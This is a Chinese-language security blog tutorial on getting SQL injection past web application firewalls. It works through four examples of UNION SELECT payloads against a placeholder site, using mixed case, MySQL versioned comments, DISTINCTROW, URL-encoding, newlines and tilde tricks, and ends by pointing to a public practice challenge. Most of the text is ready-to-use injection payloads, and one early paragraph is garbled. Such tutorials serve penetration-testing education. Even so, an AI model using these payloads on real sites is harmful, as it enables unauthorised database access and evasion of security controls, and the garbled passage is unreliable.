文章作者:小椰树
今天,我们将讨论如何在SQL注入中绕过Web应用程序防火墙。本篇文章有点长,所以耐心阅读。
我们大多数人在渗透测试的过程中都会遇到WAF,绕过不分析这部分词是被firewall.so WAF绕过之前你首先要检查的话,一部分是被防火墙***
现在我讲说一下我在渗透测试过程中遇到的一些例子:
例1:
http://www.site.com/php?id=2 uNiOn-- - [waf]
http://www.site.com/php?id=2 SeLeCt -- - [no waf]
在这里防火墙拦截了"uNiOn"关键词
http://www.site.com/php?id=2 /*!50000uNiOn*/ select 1,2,3,4,5-- -
注:使用大写和小写的组合有时会绕过WAF
“所以我们可以使用大写和小写的组合”,例如:uNiOn SeLeCt 等等
例2:
http://www.site.com/php?id=2 uNiOn-- - [no waf]
http://www.site.com/php?id=2 SeLeCt-- - [no waf]
http://www.site.com/php?id=2 uNiOn SeLeCt [waf]
在这里的防火墙拦截了uNiOn 跟SeLeCt 组合
我们可以尝试如下:
http://www.site.com/php?id=2 uNiOn DISTINCTROW SeLeCt 1,2,3,4,5-- -
http://www.site.com/php?id=2 uNiOn%23%0ASeLeCt 1,2,3,4,5-- -
还有:% 23 = > URL编码的形式#,% 0a = >换行
http://www.site.com/php?id=2 uNiOn DISTINCTROW SeLeCt 1,2,3,4,5-- - [waf]
http://www.site.com/php?id=2 /*!50000uNiOn*/ DISTINCTROW SeLeCt 1,2,3,4,5-- -
例3:
http://www.site.com/php?id=2 uNiOn-- - [waf]
http://www.site.com/php?id=2 SeLeCt-- - [no waf]
http://www.site.com/php?id=2 uNiOn SeLeCt-- - [waf]
来让我们尝试bypass 一下:
http://www.site.com/php?id=2 /*!50000uNiOn*/ SeLeCt-- - [waf]
http://www.site.com/php?id=2 /*!50000uNiOn*/ DISTINCTROW SeLeCt-- - [waf]
url encoding 编码一下:
http://www.site.com/php?id=2 %75nIOn SeLeCt -- -[waf]
http://www.site.com/php?id=2 %75nIOn %73eLeCt-- - [no waf]
这里 %75 => u and %73 => s {url encoded from}
例4:
http://www.site.com/php?id=2
来让我们尝试一下
http://www.site.com/php?id=2 /*!50000union*/-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,2-- - [waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,~~2-- - (no waf)
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,~~2,~~3,~~4,~~5-- - [bypassed]
或者
http://www.site.com/php?id=2 uNiOn(/**_**/(seLeCt(1),(2),(3),(4),(5))-- - [bypassed]
最后的作业:
学习了这么多东西,来尝试一下bypass的挑战吧,注入链接如下:
http://zixem.altervista.org/SQLi/level3.php?item=3
文章作者:小椰树
本文作者:Ms08067安全实验室
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/130896.html